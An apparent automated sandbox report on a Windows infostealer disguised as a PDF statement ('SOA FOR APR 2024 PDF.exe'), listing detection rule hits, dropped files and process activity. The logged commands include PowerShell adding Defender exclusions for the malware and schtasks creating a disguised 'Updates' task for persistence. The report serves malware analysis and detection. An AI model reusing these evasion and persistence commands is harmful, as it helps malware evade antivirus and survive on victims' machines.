                    Source: eeBIYZL.exe.0.drStatic PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"
                    Source: SOA FOR APR 2024 PDF.exe, 00000000.00000002.2075783842.0000000006BE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs SOA FOR APR 2024 PDF.exe
                    Source: SOA FOR APR 2024 PDF.exe, 00000000.00000002.2070082705.0000000000E4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SOA FOR APR 2024 PDF.exe
                    Source: SOA FOR APR 2024 PDF.exe, 00000000.00000002.2077429263.0000000009CB0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SOA FOR APR 2024 PDF.exe
                    Source: SOA FOR APR 2024 PDF.exe, 00000000.00000002.2071533656.00000000048BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamec0fe0520-5c7a-42ab-a1ed-336010ccc94a.exe4 vs SOA FOR APR 2024 PDF.exe
                    Source: SOA FOR APR 2024 PDF.exe, 00000000.00000002.2070759087.0000000002BC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamec0fe0520-5c7a-42ab-a1ed-336010ccc94a.exe4 vs SOA FOR APR 2024 PDF.exe
                    Source: SOA FOR APR 2024 PDF.exe, 00000000.00000002.2075783842.0000000006C0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHYv.exe" vs SOA FOR APR 2024 PDF.exe
                    Source: SOA FOR APR 2024 PDF.exe, 00000000.00000002.2071533656.0000000004557000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SOA FOR APR 2024 PDF.exe
                    Source: SOA FOR APR 2024 PDF.exe, 00000009.00000002.3274870194.0000000000AF8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs SOA FOR APR 2024 PDF.exe
                    Source: SOA FOR APR 2024 PDF.exeBinary or memory string: OriginalFilenameHYv.exe" vs SOA FOR APR 2024 PDF.exe
                    Source: SOA FOR APR 2024 PDF.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.48f62c8.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 15.2.BjTxJte.exe.4bec170.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 15.2.BjTxJte.exe.4c27190.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 21.2.BjTxJte.exe.45fc310.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.eeBIYZL.exe.3fe9420.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 21.2.BjTxJte.exe.4637330.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.eeBIYZL.exe.3fae400.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.48bb2a8.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 15.2.BjTxJte.exe.4bec170.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 15.2.BjTxJte.exe.4c27190.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.48f62c8.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.eeBIYZL.exe.3fe9420.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.48bb2a8.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 21.2.BjTxJte.exe.4637330.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.eeBIYZL.exe.3fae400.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 21.2.BjTxJte.exe.45fc310.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: SOA FOR APR 2024 PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: eeBIYZL.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.3b69970.6.raw.unpack, V4uC3Iifq56IKQcfry.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.3b69970.6.raw.unpack, V4uC3Iifq56IKQcfry.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.48bb2a8.5.raw.unpack, G39cBQ.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.48bb2a8.5.raw.unpack, G39cBQ.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.48bb2a8.5.raw.unpack, sDtvQjPGfa.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.48bb2a8.5.raw.unpack, sDtvQjPGfa.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.48bb2a8.5.raw.unpack, sDtvQjPGfa.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.48bb2a8.5.raw.unpack, sDtvQjPGfa.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.48bb2a8.5.raw.unpack, b1PPCKov2KZ.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.48bb2a8.5.raw.unpack, b1PPCKov2KZ.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.475f6b0.8.raw.unpack, URqoV1LhkZEcr5B7SE.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.475f6b0.8.raw.unpack, URqoV1LhkZEcr5B7SE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.475f6b0.8.raw.unpack, URqoV1LhkZEcr5B7SE.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.475f6b0.8.raw.unpack, OcGry4VRIcmlRjnwWl.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.2dc61f0.3.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.2bb1d80.0.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.2bc2120.1.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.2db5b90.2.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.53b0000.10.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@33/20@2/2
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeFile created: C:\Users\user\AppData\Roaming\eeBIYZL.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7172:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7260:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6172:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMutant created: \Sessions\1\BaseNamedObjects\HlKnubZ
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeFile created: C:\Users\user\AppData\Local\Temp\tmpCB26.tmpJump to behavior
                    Source: SOA FOR APR 2024 PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: SOA FOR APR 2024 PDF.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: SOA FOR APR 2024 PDF.exeReversingLabs: Detection: 44%
                    Source: SOA FOR APR 2024 PDF.exeVirustotal: Detection: 52%
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeFile read: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe"
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eeBIYZL.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpCB26.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess created: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\eeBIYZL.exe C:\Users\user\AppData\Roaming\eeBIYZL.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpE2E4.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess created: C:\Users\user\AppData\Roaming\eeBIYZL.exe "C:\Users\user\AppData\Roaming\eeBIYZL.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmp9B5.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmp2ADA.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eeBIYZL.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpCB26.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess created: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpE2E4.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeProcess created: C:\Users\user\AppData\Roaming\eeBIYZL.exe "C:\Users\user\AppData\Roaming\eeBIYZL.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmp9B5.tmp"
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmp2ADA.tmp"
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
